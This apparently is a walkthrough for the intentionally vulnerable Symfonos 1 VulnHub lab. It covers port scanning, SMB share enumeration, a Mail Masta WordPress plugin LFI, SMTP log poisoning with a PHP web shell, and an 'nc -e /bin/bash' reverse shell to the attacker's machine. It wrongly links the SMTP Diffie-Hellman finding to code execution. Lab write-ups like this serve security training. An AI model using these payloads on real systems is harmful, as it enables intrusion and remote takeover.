Symfonos 1 || VulnHub Walkthrough

Hello, everyone! Welcome to a new episode of our VulnHub Walkthrough series. In this video, we’re kicking off a series on the vulnerable machine called " SymfonOS ," which includes six different VMs with varying levels of difficulty. Today, we’ll be exploring the first VM, " SymfonOS 1 ," rated as " Easy ."

To begin, head over to the VulnHub website and download the machine's image file. 


If you're new to VulnHub, make sure to check out our playlist for helpful guides on how to use the platform. 

Vulhub: Vulnerable by Design

Vulhub provides a collection of pre-built vulnerable docker environments, designed for learning and practicing security vulnerability assessments and penetration testing. Explore various scenarios and improve your cybersecurity skills.

Now, let’s get started with exploiting this machine!


Settings Up

Previously, we've downloaded the image, the next step is to set up the Virtual image in VirtualBox. 

The downloaded image file is in the form of 7Z format, so start by extracting the archive to access the files within. You’ll find several files, including the essential VMDK files, in the extracted folder.

Now, our next step involves “ creating a new virtual machine ”. In VirtualBox, click " New " to create a new VM. 

Name it "SymfonOS 1," set the OS type to Linux, and choose "Other Linux 64-bit" for the version since the specific distribution is unknown.

Now, Allocate the desired amount of RAM. 

Next, select " Use an existing virtual hard disk file " and locate the VMDK file and, click on " Finish " to complete the setup. 

Once the setup is finished, you'll see the "SymfonOS 1" vulnerable machine in the VirtualBox manager. For better organization, let me regroup it into the VulnHub group.

To ensure that both your Kali Linux machine (used for attacks) and the vulnerable machine are connected to the same network, we have to make sure they're both connected via a host-only Adapter?

So, go to “settings” and change the Network adapter to "Host-Only." 

Since everything is ready, let’s attempt to start the VM to check if it works.

Once it's ready, you should see a login prompt, indicating that everything is set up and we can begin our exploration!

Finally, notice that our vulnerable machine is ready, awaiting a login prompt. Let's dive into the fun!


Enumeration

Identifying IP address

The initial step in our attack is enumeration, which involves identifying the IP address of our target machine using Net Discover. To execute this, open a terminal and run " netdiscover -i <Specify Network Interface name> ", which in this case is "eth1."

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1  

 Currently scanning: 192.168.107.0/16   |   Screen View: Unique Hosts                                                                                    
                                                                                                                                                         
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.103.2   08:00:27:ca:20:8e      2     120  PCS Systemtechnik GmbH                                                                                
 192.168.103.1   0a:00:27:00:00:14      1      60  Unknown vendor                                                                                        
 192.168.103.13  08:00:27:45:fa:02      1      60  PCS Systemtechnik GmbH   

We obtained our target IP address from the scan results: " 192.168.103.13 ".


Conduct a Network Scan

Next, we'll conduct a network scan to identify open ports, a crucial step in the enumeration process. This helps us understand the attack surface and strategize targeted attacks. For this purpose, we'll use the popular Nmap tool.

On the terminal, Run " nmap -sC –sV <specify the IP address> ”.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.103.13  

In this command, 

  • " -sC " is used to perform a script scan using the default set of scripts, and 
  • the "-sV" enables version detection allowing us to identify which versions are running on which port.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 05:14 EST
Nmap scan report for symfonos.local (192.168.103.13)
Host is up (0.00043s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m58s, deviation: 3h27m50s, median: -1s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2024-11-22T04:14:48-06:00
| smb2-time: 
|   date: 2024-11-22T10:14:48
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.06 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

After completing the network scan, 5 open ports with corresponding services were revealed:

  • Port 22 TCP: Running an SSH Secure Shell service, which allows remote access to the device if valid credentials are available.
  • Port 25 TCP: Running SMTP, a service used for email sending. The scan indicates support for features like STARTTLS (encryption) and large attachments.
  • Port 80 TCP: Running an HTTP web server, which serves web content. The scan shows a basic website with no title, hosted on Apache web server software.
  • Ports 139 and 445 (tcp): Running NetBIOS services (Samba). These ports are commonly used for file and printer sharing.

We’ll leverage these open ports to gain initial access to the server. Before proceeding, let’s conduct a deeper enumeration of these ports to uncover potential clues or vulnerabilities that might help us gain a foothold or shell access.


Perform Nmap Scripting Engine(NSE)

Now, let’s use the Nmap Scripting Engine to scan for known vulnerabilities on the detected ports and services. 

┌──(kali㉿kali)-[~]
└─$ nmap --script vuln 192.168.103.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-22 05:20 EST
Nmap scan report for symfonos.local (192.168.103.13)
Host is up (0.00043s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 2048
|             Generator Length: 8
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /manual/: Potentially interesting folder
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

Nmap done: 1 IP address (1 host up) scanned in 48.25 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The scan reveals a few notable vulnerabilities:

  1. Anonymous Diffie-Hellman Key Exchange MitM Vulnerability : This vulnerability affects the SMTP service and weakens encrypted communication, making it susceptible to man-in-the-middle (MitM) attacks.
  2. Service regsvc in Microsoft Windows systems vulnerable to denial of service : This vulnerability affects the regsvc service, mainly in older Windows systems, and could allow an attacker to crash the service.

Based on our scan results, our next steps involve a closer examination of each service and identified vulnerabilities to assess if they can be exploited to gain shell access. To leverage these findings, we’ll begin with an exploration of each exposed service, starting with the web service.


Web Enumeration and Directory-busting

From the Network mapping, the scan identifies that Port 80 is open, indicating a running web service. 

80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).

To look at the contents ourselves, open a web browser, and navigate to the target’s IP address in the URL bar at the top of the window.

Upon visiting the webpage, we find an image, likely depicting a scene from Greek mythology—possibly the Fall of Phaeton—though it doesn’t provide any useful information for our purposes.

To uncover potential entry points, our next step is directory busting to search for hidden directories or pages that might contain valuable information. For this, we’ll use the gobuster tool. Run the following command:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.103.13/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

where, 

  • gobuster dir  is used to instruct go-buster to perform directory busting. 
  • -u  is used to specify the target URL we want to explore. 
  • -w  is used to provide the path to the wordlist containing common directory names to try.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.103.13/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/manual               (Status: 301) [Size: 317] [--> http://192.168.103.13/manual/]
/server-status        (Status: 403) [Size: 302]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

After running gobuster , we didn’t find any valuable information on the website. So, we’ll shift our focus to other open ports for potential leads. 


SMB Share Enumeration

The SMB (Samba) service on Ports 139 and 445 is a good candidate for further investigation, as it might contain accessible or misconfigured shares that can provide useful information.

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

Sometimes, due to misconfigurations, files or directories are left exposed and can be accessed without authentication. To investigate, we’ll use the smbclient tool with the - N flag, which allows us to check for available shares without requiring a username or password.

┌──(kali㉿kali)-[~]
└─$ smbclient -L 192.168.103.13 -N

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk      
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The command output shows several shared directories:

  1. print$ : This is typically used for printer drivers and may not contain sensitive data.
  2. helios : A personal share labeled "Helios," likely belonging to a specific user. This may contain personal files or sensitive data.
  3. anonymous : An open share, potentially accessible to anyone without authentication. This could be a misconfiguration and may contain useful information.
  4. IPC$ : An inter-process communication share, generally used for communication between processes and not likely to contain valuable files.

Let’s try to access the shown shared directories. 

┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\print$\' -N
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\helios\' -N
tree connect failed: NT_STATUS_ACCESS_DENIED
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Because we do not have a valid password we are not able to access it, which results from us access denied error.

┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\anonymous\' -N
Try "help" to get a list of possible commands.
smb: \>

But, while I trying to access the "anonymous" share, it was not required, which resulted in us successfully accessing it. For, further exploration, we will list the files and directories in this share.

smb: \> ls
  .                                   D        0  Fri Jun 28 21:14:49 2019
  ..                                  D        0  Fri Jun 28 21:12:15 2019
  attention.txt                       N      154  Fri Jun 28 21:14:49 2019

                19994224 blocks of size 1024. 17261784 blocks available
smb: \>

The file attention.txt appears significant, so we’ll download it and inspect its contents for any helpful information to potentially gain further access to the system.

smb: \> get attention.txt 
getting file \attention.txt of size 154 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ cat attention.txt 

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'! 

Next person I find using one of these passwords will be fired!

-Zeus

                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$  

Upon review, the attention.txt file indicates that weak passwords such as "epidioko," "qwerty," and "baseball" are in use by some users on this system. This insight is valuable, as it suggests that users on the target machine may be using weak or commonly used passwords across various accounts and services. 

Now, let’s try to access the  helios  share. 


Enumerate Helios Share

Initially, when attempting to connect, the system defaults to using the local username, kali , as the target user. As a result, entering the password provided in the hint returns an “Access Denied” error since the username kali does not have permission on this share.

Since we previously discovered a username, helios, we can try specifying this user explicitly by using the ` -U ` flag with helios as the username. With this adjustment, we attempt to log in to the helios share using common passwords. After a few tries, we successfully authenticate with a weak password.

┌──(kali㉿kali)-[~]
└─$ smbclient '\\192.168.103.13\helios\' -U helios
Password for [WORKGROUP\helios]:
Try "help" to get a list of possible commands.
smb: \>

Once logged in, we can list the files and directories within the **helios** share. This allows us to explore its contents, potentially uncovering personal files or sensitive data that could assist in further understanding the system or gaining additional access.

smb: \> ls
  .                                   D        0  Fri Jun 28 20:32:05 2019
  ..                                  D        0  Fri Jun 28 20:37:04 2019
  research.txt                        A      432  Fri Jun 28 20:32:05 2019
  todo.txt                            A       52  Fri Jun 28 20:32:05 2019

                19994224 blocks of size 1024. 17261784 blocks available
smb: \> 

Two files, research.txt and todo.txt , are present. We’ll retrieve both files for closer examination.

smb: \> get research.txt 
getting file \research.txt of size 432 as research.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get todo.txt 
getting file \todo.txt of size 52 as todo.txt (12.7 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> 

Once downloaded, we'll examine the contents to determine if they contain critical information, like usernames, passwords, or system-related data that might support our exploitation efforts.

┌──(kali㉿kali)-[~]
└─$ cat research.txt 
Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The content of research.txt appears to provide background information on Helios, the Greek god of the Sun, rather than offering technical details, login credentials, or explicit clues for system access. It describes Helios’s role in mythology, including his daily journey across the sky on a golden chariot and his connection to the Colossus of Rhodes, an ancient Wonder of the World.

In summary, while research.txt it doesn’t contain actionable information, so, let’s move on to 2nd text file.

┌──(kali㉿kali)-[~]
└─$ cat todo.txt    

1. Binge watch Dexter
2. Dance
3. Work on /h3l105

                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

The content of todo.txt reveals a list of personal tasks but includes a potentially useful directory name.

The line “ Work on /h31105 ” suggests that this directory might exist on the web server (port 80) and could be accessible via a web browser.  Now, let’s navigate to  the directory  could reveal files, scripts, or pages containing useful information or possibly even vulnerabilities.

Upon accessing the directory, it looks like a broken WordPress site. So, let’s access blog content to look at the content. But it looks like, upon attempting to access the webpage through a browser window, we are presented with we’re having trouble finding that site.

Here, we can’t connect to the server at “ symfonos.local ”. This type of error appears due to two underlying reasons. 

  1. The first one is, if we have mistyped the URL address in our URL search bar so that the DNS servers can't find the associated IP address for the mistyped name or 
  2. the second reason is, that we never entered any hostname like “ symfonos.local ” into the search bar, but the website expects us to.

This type of problem can be fixed by modifying the Local DNS file located in the  /etc/hosts directory. 

Open a terminal and then type nano and then specify the path of the host table, and add the IP address with its associated hostname in the “ /hosts ” table, which would allow your web client to visit the website that was previously reporting an error.

┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts

Now save it using CTRL + X and hit Enter .

Once this configuration is complete, we can proceed to reload the target's webpage and verify if it loads successfully or not. Since the requested hostname now has an association in your “ /hosts ” file, the website can load without any issue. 

After refreshing the browser, we successfully access the blog content. 


Enumerate WordPress Site

Based on prior knowledge, WordPress sites can be vulnerable if not properly maintained, making them a common target for exploitation. To identify potential weaknesses, we’ll use the WPScan tool to analyze the site’s WordPress version, themes, and plugins.

WPScan is a security tool that checks for vulnerabilities associated with outdated WordPress versions, plugins, and themes, helping identify if the site is exposed to any known security risks.

If you’re new to using WPScan, I recommend watching this tutorial video and reading my blog post, where I cover WPScan’s functionality and detailed usage. 

WPScan: WordPress Security Scanner

Discover WPScan, a powerful security scanner specifically designed for WordPress websites. This guide covers its features, installation process, and how to use WPScan to identify vulnerabilities and enhance the security of your WordPress site.

These resources will help you understand how to effectively scan WordPress sites for vulnerabilities.

To begin, open your terminal and enter the command: wpscan --url  <URL of the WordPress site> .

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://192.168.103.13/h3l105/

This command initiates a scan that will analyze the WordPress site for vulnerabilities , misconfigurations , and other security issues.

Now, let’s examine the Output Highlights from the scan, where we can review some significant findings. These findings may reveal potential vulnerabilities, outdated plugins or themes, weak passwords, and more, which can help guide further investigation or remediation steps.

  • The XML-RPC feature is active on this site. XML-RPC can be vulnerable to certain WordPress attacks, such as brute force or denial of service, making it worth noting for further investigation.
  • The scan identifies the site as running WordPress version 5.2.2 , an older version with known vulnerabilities. This information is valuable, as vulnerabilities in outdated WordPress versions can often be exploited if not patched.
  • The active theme, Twenty Nineteen , is also outdated. Older themes can expose sites to theme-specific vulnerabilities, so this could potentially be an entry point if any unpatched issues exist.
  • WPScan detects the presence of two plugins, with particular attention to the Mail Masta plugin (version 1.0). This plugin has been associated with vulnerabilities in the past, making it especially interesting for our investigation.

With the Mail Masta plugin identified, let's search for any documented vulnerabilities specifically affecting version 1.0. If exploitable, these vulnerabilities could provide an initial foothold on the target system.


Foothold

Search Vulnerability

On the terminal run the following command:

┌──(kali㉿kali)-[~]
└─$ searchsploit mail-masta 1.0                   
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                                                  | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)                                                              | php/webapps/50226.py
WordPress Plugin Mail Masta 1.0 - SQL Injection                                                                         | php/webapps/41438.txt
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Our search with Searchsploit reveals three known vulnerabilities for the Mail Masta 1.0 plugin, including Local File Inclusion (LFI) and SQL Injection. The LFI vulnerability stands out, as it could allow us to read files on the server by manipulating the file path in the URL. This access might reveal sensitive information, such as configuration files or credentials, helping us further compromise the target system.

Let's save and examine the exploit file 40290.txt to gain further insight into leveraging the LFI vulnerability. 

┌──(kali㉿kali)-[~]
└─$ searchsploit -m php/webapps/40290.txt
  Exploit: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/40290
     Path: /usr/share/exploitdb/exploits/php/webapps/40290.txt
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/40290.txt


                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

Once downloaded, we’ll thoroughly review the steps provided in the exploit.

[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion

The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);

Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);

Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);


This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.


Typical proof-of-concept would be to load passwd file:


http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

The 40290.txt file documents a Local File Inclusion (LFI) vulnerability in the Mail Masta WordPress plugin. This vulnerability allows attackers to include files from the server by passing a specifically crafted parameter to a vulnerable file inclusion function. Here’s how the exploit works:

Now, let’s Understand the Vulnerability. The plugin files count_of_send.php and csvexport.php use include($_GET['pl']); without proper input validation, meaning they can accept user-supplied paths and include files directly from the server. This enables an attacker to read sensitive files on the system if they know the file paths.

A common way to verify this type of vulnerability is by attempting to load sensitive files like /etc/passwd on Linux systems, which contain a list of user accounts.

Using the provided example URL, we can test for this vulnerability.

http://target-server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

For this purpose, first, we have to replace target-server with the actual target IP or domain. If successful, the server will display the contents of /etc/passwd , confirming that LFI is possible.

As a result, The LFI exploit successfully displayed the contents of /etc/passwd . After confirming the LFI vulnerability, we can attempt to access other critical files on the server that may contain sensitive information, such as wp-config.php . This file typically holds database credentials and other application secrets, which could facilitate further exploitation.

However, the exact location of   wp-config.php   is still being determined. To move forward, we might aim to establish a reverse shell for deeper access. 


Exploiting SMTP service with Log Poisoning

Upon examining open ports, we observe that the SMTP service is active, indicating a potential mail server connection. 

25/tcp  open  smtp        Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8

Based on the /etc/passwd output, it appears the default mail directory is /var/mail , though it is currently inaccessible. Mail logs or stored data may sometimes be separated by user ID. 

Since we have identified the user ID as helios , this might provide a way to monitor or interact with incoming mail activity.

In a previous Nmap scan, we identified a vulnerability within the SMTP service, specifically an Anonymous Diffie-Hellman Key Exchange MitM (Man-in-the-Middle) vulnerability. 

25/tcp  open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 2048
|             Generator Length: 8
|             Public Key Length: 2048
|     References:
|_      https://www.ietf.org/rfc/rfc2246.txt

This vulnerability allows potential exploitation for Remote Code Execution (RCE), enabling us to inject commands that could lead to compromising the mail server. 

By exploiting this vulnerability, we aim to establish a reverse shell and potentially escalate privileges, gaining full control over the target system.

To exploit this vulnerability, we need to send an anonymous email via SMTP using specific commands. Telnet or Netcat can facilitate this process, allowing us to directly interact with the SMTP server.

To initiate the session, on the terminal connect to the SMTP server on port 25

┌──(kali㉿kali)-[~]
└─$ telnet 192.168.103.13 25                                                        
Trying 192.168.103.13...
Connected to 192.168.103.13.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)

At this stage, we see the server’s greeting, indicating the SMTP session is established.

Next, use the HELO  a command followed by a domain name (either our domain or a random one) to introduce ourselves to the server. 

HELO example.com
250 symfonos.localdomain

The server responds with 250 , confirming that it acknowledges our introduction.

Now, we need to specify the Sender. Use the MAIL FROM command to define the sender's email address. 

MAIL FROM:<[email protected]>
250 2.1.0 Ok

The server’s 250 2.1.0 Ok response confirms the sender’s address.

Now, we need to specify the Recipient.  Use the RCPT TO command to set the recipient's email address. In this case, we’ve determined that the target’s mail username is helios .

RCPT TO:Helios
250 2.1.5 Ok

Now, we need to compose the Message. To initiate message composition, use the DATA command. 

DATA
354 End data with <CR><LF>.<CR><LF>

This command indicates the start of the email content.

Now, let’s write the Message. Now, instead of a standard email message, we’ll insert our RCE code. 

<?php system($_GET['cmd']); ?>

This code snippet will allow us to execute system commands on the target server if successfully triggered. 

Ending the message with a  single period ( . )  on a line by itself signals to the SMTP server that the message is complete.

.
250 2.0.0 OK: queued as E588740698

After injecting the PHP payload via email, we can refresh our browser or monitor server logs to check if the payload executed successfully. This approach confirms if our log poisoning attempt has allowed for command injection on the target system.

To start, we’ll send basic commands through the cmd parameter to test for Remote Code Execution (RCE)

http://target-server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=<command_here>

Once we verify that commands can be executed, we’ll proceed with a reverse shell for a more interactive connection.


Gain ReverseShell

To establish a reverse shell, we’ll craft a payload for the target’s RCE URL that will connect back to our Kali Linux machine. 

nc -e /bin/bash <Listening Host IP> <Listening Port>

For this payload, include the Kali Linux IP address and specify the listening port. On the Kali machine, set up a Netcat listener to receive the connection from the target. 

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234  
listening on [any] 1234 ...

Once the reverse shell payload is executed on the target, a successful connection will grant us shell access to the system. 

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234  
listening on [any] 1234 ...
connect to [192.168.103.3] from (UNKNOWN) [192.168.103.13] 51150

After initiating the listener, a connection is established from the target IP address, confirming that the payload has successfully triggered a callback to the listener.

Upon initiating the listener, the target system connects back to our Kali machine, and we confirm the callback by checking the connection. The target's IP address in the listener logs indicates that the payload has successfully triggered the reverse connection.

Now, let's confirm the shell is working by running a simple command, such as `id`. 

id
uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

This reveals the current user and group information, showing that the user is " helios ." However, while the shell is functional, it lacks interactivity. To make the shell more usable, we check for Python by running ` which python `, which returns its location at ` /usr/bin/python `. We then run ` python -c "import pty; pty.spawn('/bin/bash')" ` to spawn a pseudo-terminal, improving shell interactivity.

which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
<h3l105/wp-content/plugins/mail-masta/inc/campaign$ 

After enabling the interactive shell, we navigate to the /home directory to look for a user flag. Inside, we locate a directory belonging to the user " helios ."  We list its contents using  ls -al , but find no user flag present. 

<h3l105/wp-content/plugins/mail-masta/inc/campaign$ cd /home
cd /home
helios@symfonos:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root   root   4096 Jun 28  2019 .
drwxr-xr-x 22 root   root   4096 Jun 28  2019 ..
drwxr-xr-x  3 helios helios 4096 Jun 28  2019 helios
helios@symfonos:/home$ cd helios
cd helios
helios@symfonos:/home/helios$ ls -al
ls -al
total 24
drwxr-xr-x 3 helios helios 4096 Jun 28  2019 .
drwxr-xr-x 3 root   root   4096 Jun 28  2019 ..
lrwxrwxrwx 1 root   root      9 Jun 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 helios helios  220 Jun 28  2019 .bash_logout
-rw-r--r-- 1 helios helios 3526 Jun 28  2019 .bashrc
-rw-r--r-- 1 helios helios  675 Jun 28  2019 .profile
drwxr-xr-x 2 helios helios 4096 Jun 28  2019 share
helios@symfonos:/home/helios$ 

To proceed, we need to escalate privileges to gain root access, as standard user privileges limit our ability to fully investigate the system.


Privilege Escalation

In privilege escalation, our main objective is to gather system information and identify any potential vulnerabilities or misconfigurations that could allow us to gain elevated privileges, ideally achieving root access. However, because we are connected through a reverse shell, we only have limited user privileges, which restricts our ability to access certain files and commands needed for a full assessment.


SUID Enumeration

To identify privilege escalation opportunities, we search for files with the SUID (Set User ID) bit set, which allows a user to execute these files with the permissions of the file owner—usually root. We use the command find / -perm -4000 2>/dev/null to locate files with SUID permissions. 

helios@symfonos:/home/helios$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
helios@symfonos:/home/helios$

This search reveals several binaries, including /opt/statuscheck , those that appear unusual and warrant further investigation.

helios@symfonos:/home/helios$ /opt/statuscheck
/opt/statuscheck
HTTP/1.1 200 OK
Date: Fri, 22 Nov 2024 13:00:09 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html

helios@symfonos:/home/helios$ 

